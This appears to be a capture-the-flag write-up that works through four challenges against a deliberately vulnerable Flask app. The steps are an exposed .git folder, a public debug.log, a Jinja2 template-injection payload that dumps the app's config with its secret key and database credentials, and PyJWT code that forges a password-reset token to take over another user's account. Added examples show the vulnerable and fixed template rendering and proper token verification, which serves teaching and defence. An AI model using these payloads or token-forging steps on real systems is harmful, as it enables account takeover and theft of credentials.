@ricardojba
Last active May 29, 2022 11:29
-- challenge 1:
From the name of the challenge it was a dead giveaway that there was a .git folder exposed.
Then just find out where the git repo is hosted by pulling the repository config:
curl http://0x70.apl3b.com/.git/config
The remote url in that file points at the repo hosting service:
https://gitlab.com/DDuarte/twipy.git
Finally, walk the commit history; in this one the flag can be read in the diff at the bottom of the page (a secret committed to source stays recoverable from history even after it is removed from HEAD):
https://gitlab.com/DDuarte/twipy/commit/508cc297eb2d5412a5f994e87a27b43ffbf033a4
{flag}Us3_vault_for_no_p4sswords_1n_s0urce_cod3.
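As an added example (not the challenge author's or twipy's code): the same recovery step in Python, parsing a `.git/config` body and pulling every remote url out of it. The sample config below is constructed to look like what the curl above returns; `fetch_git_config` is a thin urllib wrapper for live use and is not exercised offline. A hand-rolled parser is used because git indents its keys with tabs, which Python's configparser would treat as continuation lines of the previous value.

```python
"""Parse an exposed .git/config and report the remote(s) it points at.

Added example for this writeup; not code from the challenge author or the
twipy project. SAMPLE_GIT_CONFIG is constructed (the URL in it is the one
the writeup recovered).
"""
import re
from urllib.request import urlopen

# Constructed sample of what `curl http://host/.git/config` typically returns.
SAMPLE_GIT_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
\tlogallrefupdates = true
[remote "origin"]
\turl = https://gitlab.com/DDuarte/twipy.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
\tremote = origin
\tmerge = refs/heads/master
"""

# [name] or [name "subsection"]
SECTION_RE = re.compile(r'^\[(\w+)(?:\s+"([^"]*)")?\]$')


def parse_git_config(text):
    """Return {section: {key: value}} for git's INI-like config format.

    [remote "origin"] becomes the key 'remote.origin'. configparser is not
    used on purpose: git's tab-indented keys would be read as continuation
    lines of the preceding value.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            name, sub = m.groups()
            current = name if sub is None else f"{name}.{sub}"
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip()] = value.strip()
    return sections


def remote_urls(text):
    """Return {remote_name: url} for every [remote "..."] section with a url."""
    urls = {}
    for section, kv in parse_git_config(text).items():
        if section.startswith("remote.") and "url" in kv:
            urls[section.split(".", 1)[1]] = kv["url"]
    return urls


def fetch_git_config(base_url, timeout=10):
    """Fetch <base_url>/.git/config; return the body, or None if it is not exposed."""
    try:
        with urlopen(base_url.rstrip("/") + "/.git/config", timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    for name, url in remote_urls(SAMPLE_GIT_CONFIG).items():
        print(f"{name}: {url}")
```

Live use is `remote_urls(fetch_git_config("http://target"))` after a None check; if `/.git/config` answers with real content, treat the whole repository, including its history, as leaked.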
-- challenge 2:
Just use dirsearch.py to brute-force file names on the web server,
or
search the repo for the word "debug". Again the hint from the challenge name helped here:
https://gitlab.com/search?utf8=%E2%9C%93&snippets=&scope=&search=debug&project_id=10269530
Fetch the file from the web server and read the flag in the error messages:
http://0x70.apl3b.com/debug.log
{flag}b3_c4r3ful_w1th_Wh4t_y0u_l34v3_pUbl1c
-- challenge 3:
Vulnerability: Server Side Template Injection (SSTI) in Jinja2/Flask
Some references:
https://ctftime.org/writeup/10895
https://eugenekolo.com/blog/hitcon-ctf-2016-writeups/
https://hackerone.com/reports/125980
Register a user on the website http://0x70.apl3b.com and create a private post whose body is the payload: {{config}}
Hint: don't use your real email --> OPSEC, remember the (un)safe debug.log ;)
You just posted: <Config {'JSON_AS_ASCII': True, 'BOOTSTRAP_LOCAL_SUBDOMAIN': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAIL_USERNAME': 'twipytwipy77@gmail.com', 'SQLALCHEMY_POOL_RECYCLE': None, 'SQLALCHEMY_ECHO': "False", 'SQLALCHEMY_TRACK_MODIFICATIONS': "False", 'SQLALCHEMY_POOL_TIMEOUT': None, 'SQLALCHEMY_RECORD_QUERIES': None, 'SESSION_COOKIE_DOMAIN': "False", 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'BOOTSTRAP_QUERYSTRING_REVVING': True, 'MAIL_SERVER': 'smtp.gmail.com', 'SQLALCHEMY_NATIVE_UNICODE': None, 'MAX_CONTENT_LENGTH': None, 'MAIL_USE_TLS': "False", 'ELASTICSEARCH_URL': 'el:9200', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'SQLALCHEMY_POOL_SIZE': None, 'SQLALCHEMY_MAX_OVERFLOW': None, 'ADMINS': ['twipytwipy77@gmail.com'], 'TRAP_HTTP_EXCEPTIONS': "False", 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_COOKIE_PATH': None, 'BOOTSTRAP_SERVE_LOCAL': "False", 'SESSION_COOKIE_SAMESITE': None, 'SECRET_KEY': 'yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc=', 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'TESTING': "False", 'TEMPLATES_AUTO_RELOAD': None, 'JSONIFY_MIMETYPE': 'application/json', 'MAIL_USE_SSL': True, 'USE_X_SENDFILE': "False", 'SQLALCHEMY_DATABASE_URI': 'mysql+pymysql://twipy:RkZDwtkaZ9ugnwf@db/twipy', 'SESSION_COOKIE_SECURE': "False", 'POSTS_PER_PAGE': 8, 'BOOTSTRAP_USE_MINIFIED': True, 'SQLALCHEMY_BINDS': None, 'FLAG': '{flag}V4lid4t3_always_us3r_1NPUT', 'ENV': 'production', 'DEBUG': "False", 'SQLALCHEMY_COMMIT_ON_TEARDOWN': "False", 'EXPLAIN_TEMPLATE_LOADING': "False", 'MAIL_PASSWORD': None, 'JSONIFY_PRETTYPRINT_REGULAR': "False", 'BOOTSTRAP_CDN_FORCE_SSL': "False", 'PROPAGATE_EXCEPTIONS': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'MAIL_PORT': 465}>
{flag}V4lid4t3_always_us3r_1NPUT
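As an added example (not twipy's code, and not the challenge author's): the Jinja2 pattern that makes {{config}} work, next to the fixed version and a cheap input check. It assumes the route rendered the post by concatenating the body into the template source, which is the only way {{config}} gets evaluated; `FAKE_CONFIG` is a constructed stand-in for Flask's app.config, which render_template_string puts in the template context as `config`.

```python
"""Jinja2 SSTI: the vulnerable render beside the fix.

Added example for this writeup, not twipy's code. FAKE_CONFIG is a
constructed stand-in for Flask's app.config; the vulnerable route is an
assumption about how the post body reached the template.
"""
from jinja2 import Environment  # the engine behind flask.render_template_string

# Constructed stand-in for app.config; only the shape matters here.
FAKE_CONFIG = {"SECRET_KEY": "example-key-not-real", "FLAG": "{flag}example"}

# Flask autoescapes render_template_string() output too, so match that.
env = Environment(autoescape=True)


def render_post_vulnerable(post_body):
    """BAD: user text becomes template *source*, so {{ ... }} inside it runs.

    Flask exposes `config`, `request`, `g`, `session` in the context, which is
    why `{{config}}` dumps SECRET_KEY, the DB URI and everything else.
    """
    template_source = "You just posted: " + post_body
    return env.from_string(template_source).render(config=FAKE_CONFIG)


def render_post_fixed(post_body):
    """GOOD: the template is a constant; user text is passed in as *data*.

    Jinja never parses `body`, so template syntax in it is inert, and
    autoescape HTML-encodes it on output.
    """
    template_source = "You just posted: {{ body }}"
    return env.from_string(template_source).render(body=post_body, config=FAKE_CONFIG)


def looks_like_template_injection(text):
    """Input-validation check for posts: flag Jinja delimiters before storing."""
    return any(tok in text for tok in ("{{", "{%", "{#"))


if __name__ == "__main__":
    payload = "{{config}}"
    print(render_post_vulnerable(payload))   # leaks the whole config dict
    print(render_post_fixed(payload))        # prints the literal text {{config}}
    print(looks_like_template_injection(payload))
```

The fix is the second function, not the third: rejecting `{{` is defence in depth, while building templates from constants and passing user content as variables is what actually removes the bug.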
-- challenge 4:
Reset Willis's password by forging a password reset token, since the SECRET_KEY the tokens are signed with was extracted from the app config in challenge 3.
Get the password reset token format (claims and algorithm) from the model code:
https://gitlab.com/DDuarte/twipy/blob/master/app/models.py#L111
Get Willis's email from the repo:
https://gitlab.com/DDuarte/twipy/blob/master/twipy.py#L14
Get the UUID of the user Willis from the explore page:
http://0x70.apl3b.com/explore?page=25
Generate the password reset token (Python 2.7 with PyJWT):
pyenv global 2.7.15   # Python 2 + PyJWT 1.x: jwt.encode() returns a byte string, hence the .decode('utf-8') below
pip install PyJWT
python
import jwt
import base64
from time import time
# Claims mirror models.py (id, name, email, 10-minute exp) and the algorithm is HS256 as in the model.
# The key is the leaked SECRET_KEY, base64-decoded; the token built this way was accepted by the server.
token = jwt.encode({'id': '70a82737-a6d9-4284-93db-0600db6f05ca', 'name': 'Willis Adams', 'email': 'willis.adams@example.com', 'exp': time() + 600},base64.b64decode('yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc='),algorithm='HS256').decode('utf-8')
print(token)
quit()
Reset Willis's password through the URL that carries the forged token:
http://0x70.apl3b.com/auth/reset_password/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6IndpbGxpcy5hZGFtc0BleGFtcGxlLmNvbSIsImlkIjoiNzBhODI3MzctYTZkOS00Mjg0LTkzZGItMDYwMGRiNmYwNWNhIiwiZXhwIjoxNTQ3NzM1NjA0LjIzODk3MSwibmFtZSI6IldpbGxpcyBBZGFtcyJ9.wm73GeCyWRR2aCE_xXtsVkDnjiwVbput62sVe_V3JW0
Log in as Willis and read his second private post:
{flag}4lw4ys_v3r1fy_y0ur_t0k3NS
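As an added example (not twipy's or PyJWT's code): the same HS256 token built with only the standard library, so the header.payload.signature structure the PyJWT call above produces is visible, plus the verification the server side must do for "always verify your tokens" to hold. The key, UUID and timestamp are constructed stand-ins, not the challenge's real values; like the writeup, the key is base64-decoded before use, which is assumed to be how the app loads its SECRET_KEY.

```python
"""Forge a PyJWT-style HS256 reset token with the stdlib, and verify one properly.

Added example for this writeup; not twipy's or PyJWT's code. LEAKED_KEY,
the user id and NOW are constructed values.
"""
import base64
import hashlib
import hmac
import json


def b64url(data):
    """Unpadded base64url, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256_sign(claims, key):
    """Build header.payload.signature the way PyJWT does for HS256.

    Key order inside the JSON does not matter to a verifier, so it is sorted
    here for reproducibility.
    """
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":"), sort_keys=True).encode())
        for part in (header, claims)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_reset_token(user_id, name, email, key, now, expires_in=600):
    """Attacker side: anyone holding SECRET_KEY can mint a reset token for any user.

    Claim names mirror the writeup's jwt.encode() call; `now` is a parameter
    rather than time() so the output is reproducible.
    """
    claims = {"id": user_id, "name": name, "email": email, "exp": now + expires_in}
    return hs256_sign(claims, key)


def verify_hs256(token, key, now):
    """Server side: return the claims only if alg, signature and exp all check out."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        # Pin the algorithm: never let the token choose it (rejects alg=none and key-confusion swaps).
        if header.get("alg") != "HS256":
            return None
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        claims = json.loads(b64url_decode(payload_b64))
        if "exp" not in claims or claims["exp"] < now:
            return None
        return claims
    except (ValueError, TypeError, UnicodeDecodeError):
        return None


# Constructed demo key ("example-secret-key-for-demo-only" in base64), not the challenge's key.
LEAKED_KEY = base64.b64decode("ZXhhbXBsZS1zZWNyZXQta2V5LWZvci1kZW1vLW9ubHk=")
NOW = 1547735004  # constructed epoch seconds

if __name__ == "__main__":
    tok = forge_reset_token("00000000-0000-4000-8000-000000000000", "Willis Adams",
                            "willis.adams@example.com", LEAKED_KEY, NOW)
    print(tok)
    print(verify_hs256(tok, LEAKED_KEY, NOW + 1))    # claims dict: the server would accept this
    print(verify_hs256(tok, b"other-key", NOW + 1))  # None: wrong key
```

Nothing in `verify_hs256` can tell a forged token from a legitimate one, because the signature is the only proof and the key was public; the lesson of the flag is that verification is necessary but the secret has to stay secret for it to mean anything.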